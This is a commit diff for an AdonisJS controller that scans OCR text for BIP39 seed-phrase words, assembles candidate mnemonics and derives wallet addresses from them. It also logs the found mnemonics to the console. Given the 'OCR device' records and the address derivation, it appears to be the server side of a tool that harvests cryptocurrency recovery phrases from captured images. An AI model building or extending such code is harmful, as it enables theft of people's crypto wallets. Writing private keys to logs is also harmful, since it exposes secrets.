Просмотр исходного кода

feat(ocr): 增加记录解析功能以识别潜在助记词

- 添加 recordParsing 方法对 OCR 记录进行解析
- 实现 findPossibleMnemonics 方法寻找可能的助记词序列
- 优化导入语句,移除未使用的 rules 模块
- 引入 bip39 模块以支持助记词相关操作
wui 9 месяцев назад
Родитель
Сommit
638536e631
1 измененных файлов с 100 добавлено и 2 удалено
  1. 100 2
      app/Controllers/Http/OcrRecordController.ts

+ 100 - 2
app/Controllers/Http/OcrRecordController.ts

@@ -1,10 +1,10 @@
 import { HttpContextContract } from '@ioc:Adonis/Core/HttpContext'
 import PaginationService from 'App/Services/PaginationService'
-import { rules, schema } from '@ioc:Adonis/Core/Validator'
+import { schema } from '@ioc:Adonis/Core/Validator'
 import OcrRecord from 'App/Models/OcrRecord'
 import Drive from '@ioc:Adonis/Core/Drive'
 import BlockchainWalletService from 'App/Services/BlockchainWalletService'
-import OcrDevice from 'App/Models/OcrDevice'
+import * as bip39 from 'bip39'
 
 export default class OcrRecordController {
     private paginationService = new PaginationService(OcrRecord)
@@ -56,6 +56,7 @@ export default class OcrRecordController {
         if (record) {
             const walletAddresses = await BlockchainWalletService.getAllAddresses(record.content)
             record.detail = JSON.stringify(walletAddresses)
+            record.content = await this.recordParsing(record.content)
             await record.save()
             return response.ok(record)
         } else {
@@ -71,4 +72,101 @@ export default class OcrRecordController {
         })
         return BlockchainWalletService.getAllAddresses(request.input('mnemonic'))
     }
+
+    public async recordParsing(record: string) {
+        // 解析记录字符串
+        const lines = record.split('\n')
+
+        // 从文本中提取潜在的助记词
+        const potentialWords = new Set<string>()
+        const englishWordRegex = /[a-zA-Z]+/g
+
+        // 遍历所有行提取英文单词
+        lines.forEach((line) => {
+            const words = line.match(englishWordRegex)
+            if (words) {
+                words.forEach((word) => {
+                    // 忽略数字和分数值
+                    if (!word.includes('.') && isNaN(Number(word))) {
+                        potentialWords.add(word.toLowerCase())
+                    }
+                })
+            }
+        })
+
+        // 过滤出可能是BIP39助记词的单词
+        const potentialBip39Words = Array.from(potentialWords).filter((word) => {
+            // 使用bip39.wordlists.english检查单词是否在BIP39词表中
+            return bip39.wordlists.english.includes(word)
+        })
+
+        // 寻找连续助记词序列
+        const possibleMnemonics = await this.findPossibleMnemonics(lines, potentialBip39Words)
+
+        console.log('Potential BIP39 words:', potentialBip39Words.toString())
+        console.log('Potential mnemonics:', possibleMnemonics.toString())
+
+        // 将所有可能的助记词合并为一个字符串返回
+        if (possibleMnemonics.length < potentialBip39Words.length) {
+            return potentialBip39Words.join(' ')
+        }
+        return possibleMnemonics.join(' ')
+    }
+
+    // 寻找可能的助记词序列
+    private async findPossibleMnemonics(
+        recTexts: string[],
+        bip39Words: string[]
+    ): Promise<string[]> {
+        const mnemonics: string[] = []
+
+        // 检查每行文本是否包含连续地助记词
+        recTexts.forEach((text) => {
+            const words = text.split(/\s+/)
+
+            // 检查这一行是否包含多个BIP39词
+            const bip39WordsInLine = words.filter((word) => {
+                // 清理单词中的标点符号以及数字
+                const cleanWord = word.replace(/[.,;:!?0-9]/g, '')
+                return bip39Words.includes(cleanWord)
+            })
+
+            // 如果找到多个BIP39词,可能是助记词序列
+            if (bip39WordsInLine.length >= 3) {
+                // mnemonics存入bip39WordsInLine中每一个元素
+                bip39WordsInLine.map((word) => {
+                    mnemonics.push(word)
+                })
+            }
+        })
+
+        // 尝试从所有文本中提取12或24个词的序列
+        // const allWords = recTexts.join(' ').split(/\s+/)
+        // const bip39WordsInAll = allWords.filter((word) => {
+        //     const cleanWord = word.replace(/[.,;:!?]/g, '')
+        //     return bip39Words.includes(cleanWord)
+        // })
+        //
+        // bip39WordsInAll.map((word) => {
+        //     mnemonics.push(word)
+        // })
+
+        // 查找12词或24词的连续序列
+        // for (let i = 0; i <= bip39WordsInAll.length - 12; i++) {
+        //     const possibleMnemonic = bip39WordsInAll.slice(i, i + 12).join(' ')
+        //     if (bip39.validateMnemonic(possibleMnemonic)) {
+        //         mnemonics.push(possibleMnemonic)
+        //     }
+        // }
+        //
+        // for (let i = 0; i <= bip39WordsInAll.length - 24; i++) {
+        //     const possibleMnemonic = bip39WordsInAll.slice(i, i + 24).join(' ')
+        //     if (bip39.validateMnemonic(possibleMnemonic)) {
+        //         mnemonics.push(possibleMnemonic)
+        //     }
+        // }
+
+        // 返回去重后的助记词列表
+        return mnemonics
+    }
 }